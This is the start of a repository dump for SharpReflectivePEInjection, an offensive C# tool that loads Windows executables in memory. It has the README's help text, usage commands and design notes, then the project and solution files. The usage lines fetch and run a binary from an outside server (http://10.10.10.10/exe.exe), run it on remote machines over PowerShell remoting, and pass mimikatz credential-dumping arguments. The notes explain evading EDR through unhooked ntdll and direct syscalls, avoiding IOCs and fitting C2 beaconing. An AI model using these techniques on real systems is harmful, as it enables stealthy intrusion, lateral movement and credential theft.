telling me about this bug way back in november ``` C:\> SharpReflectivePEInjection.exe -h -url, -u url to the binary to download -file, -f full path to a binary to execute [useful when executing local PE on a remote machine] -b64PE pass the entire PE as B64 encoded blob (if you are a mad person) -Args, -args, -a Arguments to be passed to Exe [Optional] -patch_exit Patch CorExit and ExitProcess to ExitThread [you know what is it if you need it XD] -syscalls Instead of Mapping ntdll, will use dynamic syscalls [Hell's Gate Technique] -ComputerName use powershell remoting to execute the PE on a target machine [Optional] (Retrieves output) -DisableForceExit Disable the 1.5 Minute Maximum Runtime Enforcement [Ex: if running interactive mimikatz] -help Display this help screen. usage: .\SharpReflectivePEInjection.exe -url http://10.10.10.10/exe.exe [Optional: -Args ""] usage: .\SharpReflectivePEInjection.exe -b64PE [Optional: -Args ""] usage: .\SharpReflectivePEInjection.exe -url http://10.10.10.10/exe.exe -ComputerName server.ad.local [Optional: -Args ""] ``` ## Local Execution ## - SharpReflectivePEInjection supports multiple ways to load and execute a PE on the local machine - from a server: `.\SharpReflectivePEInjection.exe -u http://10.10.10.10/exe.exe [Optional: -Args "sekurlsa::ekeys exit"]` - from a file: `.\SharpReflectivePEInjection.exe -f c:\windows\system32\net.exe [Optional: -Args "user"] [Optional: -patch_exit]` - from a base64 blob: `.\SharpReflectivePEInjection.exe -b64PE BASE_64_BLOB [Optional: -Args "sekurlsa::ekeys exit"]` ## Remote Execution ## - SharpReflectivePEInjection supports multiple ways to load and execute a PE on a remote machine (retreives PE output from remote machine) - from a server: `.\SharpReflectivePEInjection.exe -u http://10.10.10.10/exe.exe [Optional: -Args "sekurlsa::ekeys exit"] -ComputerName server.local` - from a file: `.\SharpReflectivePEInjection.exe -f c:\windows\system32\net.exe [Optional: -Args "user"] [Optional: -patch_exit] -ComputerName server.local` - from a base64 blob: `.\SharpReflectivePEInjection.exe -b64PE BASE_64_BLOB [Optional: -Args "sekurlsa::ekeys exit"] -ComputerName server.local` ## passing arguments to PE ## - SharpReflectivePEInjection passes arguments to PE by patching 4 functions with the arguments provided through the (`-Args`) argument, those functions are: - `GetCommandLineW` - from kernelbase.dll - `GetCommandLineA` - from kernelbase.dll - `_wcmdln` - from msvcrt.dll - `_acmdln` - from msvcrt.dll - this way of patching arguments effectively makes it compatible with any argument parsing method wether thats WindowsAPI or a basic `argv[]` method ## supported architectures ## - SharpReflectivePEInjection supports both x86 and x64 architectures, if you compiled the tool for x86 you will be able to load x86 vice-versa for x64 ## Windows API hooking & IAT ## - SharpReflectivePEInjection heavily depends on DInvoke in importations for a good reason, the way its designed is that it heavily relies on `ntdll.dll` API calls and by default maps a clean version of ntdll in the begining of its execution and uses delegates to map actual function pointers from the clean ntdll to the defined delegates so the delegates can be used as functions, because ntdll is at the last point of user-land this ensures any function call will be unhooked, another perk of this is that the binary does NOT have any IAT table as every importation happens dynamically ### kernel-land calls ### - SharpReflectivePEInjection supports another way of using delegates and DInvoke to execute code, which is dynamic syscall invokation using the `GetSyscallStub()` function from DInvoke its able to read ntdll from disk extract the kernel syscall stub for the function we need and using Marshal we cast the syscall to a delegate and using this delegate we interface directly with kernel land when calling a function bypassing user-land entirely, this is known as (Hell's Gate Technique), this method is used when passing `-syscalls` argument ## Remote Reflection ## - the Remote reflection capability utilizes multiple techniques to be able to remotely execute and remotely retrieve output from the PE: - what happens locally - uses the current user context to create a remote powershell runspace on the remote machine - the code has an embedded powershell dotNET loader stored in `powershell_script` variable - retrieves its own bytes Base64 encodes them and passes them to the dotnet loader - uses whatever method the user chose to retrieve the PE (url/file/b64) and always passes the PE to the dotNet loader in Base64 - takes the passed arguments, properly filters them and passes them to the dotnet loader - forks 2 threads each thread opens a NamedPipe client that connects to (`stdout/stderr`) pipes remotely using the machine name passed to `-ComputerName` waiting to read from PE output from them - invokes the powershell dotnet loader in the remote runspace - what happens remotely - once the powershell code invoked in the remote runspace it starts to reflectively load and execute the dotNet bytes retreived first - after loading itself it starts loading the PE passed to it - after normally executing and before the PE entry point is called, it creates 2 named pipe servers and redirects its own stdout and stderr to them after this it calls a function named `Suicide` (discussed later) - once the loaded PE executed its output is passed to the named pipes which the clients from above reads - PE passing functionality - as mentioned above the PE which will be reflectively loaded on the remote machine is always passed to the remote machine in Base64, why - there is 2 good reasons behind this: - bypassing network based restrictions (ex: target machine can't reach the payload server to download the PE) - easily passing a local PE to a remote machine using the (-file) argument - the idea behind the is that we can make the C# code execute itself on another machine and make only certain aspects of the code run under dynamically defined (true/false) conditions ## Suicide (the functions XD) and IOCs ## - there are 2 functions in the code named (Suicide and LocalSuicide) *sorry for the disturbing name XD* - Suicide is called in seperate thread directly after stdout/err redirection when the program is running remotely, it waits for 15 seconds before automatically dispose all resources and make the process kills itself, the reason behind this is that if a problem happened during remote execution and the Execution didn't end properly, resources including created NamedPipes and Remote Runspaces are not disposed properly which causes 2 things, leaves IOCs on the remote machine prevents further remote reflections due to confusion in NamedPipe Communications this ensures that everytime a remote execution occurs after 15 seconds of Invoking the PE, it will close itself automatically despite any problems that may cause hanging, so we don't have to worry about cleaning up - LocalSuicide is pretty much the same thing but for local execution - the reason behind it is to ensure reliable use with C2 channels if the PE did not exit properly in a cmd session we can press CTRL-C and thats it but with C2 due to beaconing and multithreaded executions its not that simple, this ensures even if the PE errored and did not exit, that after 1.5 Mins it effectively will. the time the function waits before killing the process is 1.5 Mins, way longer than Suicide() to not interfere with actual execution - unlike Suicide, LocalSuicide can be disabled from the command line by using the `-DisableForceExit` flag ---------------------------------------------------------------------------------------- - I made this project for 2 reasons - understand more about PEs, windows internals and how to interact with them - wanted a tool that does this - these are resources and references i used during building this project: - https://github.com/nettitude/RunPE - https://labs.nettitude.com/whitepapers/NETT_RED_TEAM_PROCESS_HIVING_2021.pdf - https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/ - https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/pe-file-header-parser-in-c++#output-screenshots - https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations - https://learn.microsoft.com/en-us/windows/win32/debug/pe-format - https://www.youtube.com/watch?si=_aOPmyksf-eMu5R7&v=oe11Q-3Akuk&feature=youtu.be - https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/pe-file-header-parser-in-c++#output-screenshots - https://klezvirus.github.io/RedTeaming/Development/From-PInvoke-To-DInvoke/ - https://github.com/klezVirus/CheeseTools - https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementPSRemoting/ - https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly - https://0xrick.github.io/win-internals/pe1/ (part 1 to 7) ================================================ FILE: SharpReflectivePEInjection.csproj ================================================ Debug AnyCPU {FA483103-816E-464A-A227-8042D77ACBB4} Exe SharpReflectivePEInjection SharpReflectivePEInjection v4.8 9 512 true true AnyCPU true full false bin\Debug\ DEBUG;TRACE prompt 4 x64 pdbonly true bin\Release\ prompt 4 true true ================================================ FILE: SharpReflectivePEInjection.sln ================================================ Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.7.34024.191 MinimumVisualStudioVersion = 10.0.40219.1 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpReflectivePEInjection", "SharpReflectivePEInjection.csproj", "{FA483103-816E-464A-A227-8042D77ACBB4}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU Release|Any CPU = Release|Any CPU EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {FA483103-816E-464A-A227-8042D77ACBB4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU {FA483103-816E-464A-A227-8042D77ACBB4}.Debug|Any CPU.Build.0 = Debug|Any CPU {FA483103-816E-464A-A227-8042D77ACBB4}.Release|Any CPU.ActiveCfg = Release|Any CPU {FA483103-816E-464A-A227-8042D77ACBB4}.Release|Any CPU.Build.0 = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection GlobalSection(ExtensibilityGlobals) = postSolution SolutionGuid = {83D6D28D-4B5E-4360-B3A1-77C390E7CD01} EndGlobalSection EndGlobal